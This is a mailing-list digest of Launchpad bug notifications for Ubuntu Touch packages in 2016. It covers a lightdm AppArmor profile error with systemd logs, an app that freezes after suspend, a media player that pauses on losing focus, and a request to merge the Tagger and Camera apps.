  ProblemType: Bug
  DistroRelease: Ubuntu 16.10
  Package: lightdm 1.19.0-0ubuntu1
  ProcVersionSignature: Ubuntu 4.4.0-22.39-generic 4.4.8
  Uname: Linux 4.4.0-22-generic x86_64
  ApportVersion: 2.20.1-0ubuntu3
  Architecture: amd64
  Date: Thu May 12 21:20:13 2016
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no user)
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  SourcePackage: lightdm
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/lightdm/+bug/1581187/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1581187] Re: AppArmor parser error for /etc/apparmor.d/lightdm-guest-session in /etc/apparmor.d/lightdm-guest-session at line 14: Could not open 'abstractions/fcitx'

2016-06-04 Thread Launchpad Bug Tracker
** Branch linked: lp:~tyhicks/lightdm/guest-session-profile-fixes

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lightdm in Ubuntu.
https://bugs.launchpad.net/bugs/1581187

Title:
  AppArmor parser error for /etc/apparmor.d/lightdm-guest-session in
  /etc/apparmor.d/lightdm-guest-session at line 14: Could not open
  'abstractions/fcitx'

Status in Light Display Manager:
  New
Status in lightdm package in Ubuntu:
  Triaged

Bug description:
  The current yakkety lightdm version has a regression in its AppArmor
  profile:

  $ sudo systemctl status apparmor.service
  ● apparmor.service - LSB: AppArmor initialization
 Loaded: loaded (/etc/init.d/apparmor; bad; vendor preset: enabled)
 Active: failed (Result: exit-code) since Thu 2016-05-12 18:03:37 CEST; 3h 
17min ago
   Docs: man:systemd-sysv-generator(8)

  May 12 18:03:37 autopkgtest apparmor[493]:  * Starting AppArmor profiles
  May 12 18:03:37 autopkgtest apparmor[493]: AppArmor parser error for 
/etc/apparmor.d/lightdm-guest-session in /etc/apparmor.d/lightdm-guest-session 
at line 14: Could not open 'abstractions/fcitx'
  May 12 18:03:37 autopkgtest apparmor[493]: Skipping profile in 
/etc/apparmor.d/disable: usr.sbin.rsyslogd
  May 12 18:03:37 autopkgtest apparmor[493]: AppArmor parser error for 
/etc/apparmor.d/lightdm-guest-session in /etc/apparmor.d/lightdm-guest-session 
at line 14: Could not open 'abstractions/fcitx'
  May 12 18:03:37 autopkgtest apparmor[493]: Skipping profile in 
/etc/apparmor.d/disable: usr.sbin.rsyslogd
  May 12 18:03:37 autopkgtest apparmor[493]:...fail!
  May 12 18:03:37 autopkgtest systemd[1]: apparmor.service: Control process 
exited, code=exited status=123
  May 12 18:03:37 autopkgtest systemd[1]: Failed to start LSB: AppArmor 
initialization.
  May 12 18:03:37 autopkgtest systemd[1]: apparmor.service: Unit entered failed 
state.
  May 12 18:03:37 autopkgtest systemd[1]: apparmor.service: Failed with result 
'exit-code'.

  ProblemType: Bug
  DistroRelease: Ubuntu 16.10
  Package: lightdm 1.19.0-0ubuntu1
  ProcVersionSignature: Ubuntu 4.4.0-22.39-generic 4.4.8
  Uname: Linux 4.4.0-22-generic x86_64
  ApportVersion: 2.20.1-0ubuntu3
  Architecture: amd64
  Date: Thu May 12 21:20:13 2016
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no user)
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  SourcePackage: lightdm
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/lightdm/+bug/1581187/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1588674] Re: [Wishlist] Merge Tagger app to the Camera app

2016-06-04 Thread Launchpad Bug Tracker
Status changed to 'Confirmed' because the bug affects multiple users.

** Changed in: camera-app (Ubuntu)
   Status: New => Confirmed

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to camera-app in Ubuntu.
https://bugs.launchpad.net/bugs/1588674

Title:
  [Wishlist] Merge Tagger app to the Camera app

Status in Canonical System Image:
  Opinion
Status in camera-app package in Ubuntu:
  Confirmed

Bug description:
  Currently the Tagger app is separate from the Camera app.
  I think it would be better if we can just integrate it with the Camera app.
  Some ASUS phones has this feature.
  That would be less icon in the Apps scope without removing a functionality :)

To manage notifications about this bug go to:
https://bugs.launchpad.net/canonical-devices-system-image/+bug/1588674/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1584348] Re: app blocked after suspend

2016-06-04 Thread Michał Sawicz
Are there related .crash files in /var/crash? You may want to clear that
dir and see what happens the next time you get this issue.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to unity8 in Ubuntu.
https://bugs.launchpad.net/bugs/1584348

Title:
  app blocked after suspend

Status in Canonical System Image:
  Incomplete
Status in unity8 package in Ubuntu:
  Incomplete

Bug description:
  When you let an app opened after a while (about hours) and after that you try 
to work with it the app sometimes does not respond.
  I saw it with a lot of apps (camera, dialer, facebook, telegram, webbrowser...

  Atached you'll find a video where you can see me trying to use camera
  app without any result.

To manage notifications about this bug go to:
https://bugs.launchpad.net/canonical-devices-system-image/+bug/1584348/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1584348] Re: app blocked after suspend

2016-06-04 Thread Michał Sawicz
So what was the problem exactly? You couldn't launch the app via the
left-side launcher? Could you launch it via the Apps scope? Was it there
on the right-edge spread?

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to unity8 in Ubuntu.
https://bugs.launchpad.net/bugs/1584348

Title:
  app blocked after suspend

Status in Canonical System Image:
  Incomplete
Status in unity8 package in Ubuntu:
  Incomplete

Bug description:
  When you let an app opened after a while (about hours) and after that you try 
to work with it the app sometimes does not respond.
  I saw it with a lot of apps (camera, dialer, facebook, telegram, webbrowser...

  Atached you'll find a video where you can see me trying to use camera
  app without any result.

To manage notifications about this bug go to:
https://bugs.launchpad.net/canonical-devices-system-image/+bug/1584348/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1518331] Re: Media player pauses playback when losing focus

2016-06-04 Thread Launchpad Bug Tracker
Status changed to 'Confirmed' because the bug affects multiple users.

** Changed in: mediaplayer-app (Ubuntu)
   Status: New => Confirmed

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to mediaplayer-app in Ubuntu.
https://bugs.launchpad.net/bugs/1518331

Title:
  Media player pauses playback when losing focus

Status in mediaplayer-app:
  New
Status in mediaplayer-app package in Ubuntu:
  Confirmed

Bug description:
  While testing Unity8 in desktop mode on Nexus 4, "convergence"... I
  noticed that apps do not get suspended when they are not selected, as
  they do on the phone... this is great, and required for convergence,
  obviously.  However, the Media Player does stop playing when it loses
  focus, it appears to pause playback, rather than get suspended
  depending on focus, so I think this is a flaw in the app, not the
  system.

To manage notifications about this bug go to:
https://bugs.launchpad.net/mediaplayer-app/+bug/1518331/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp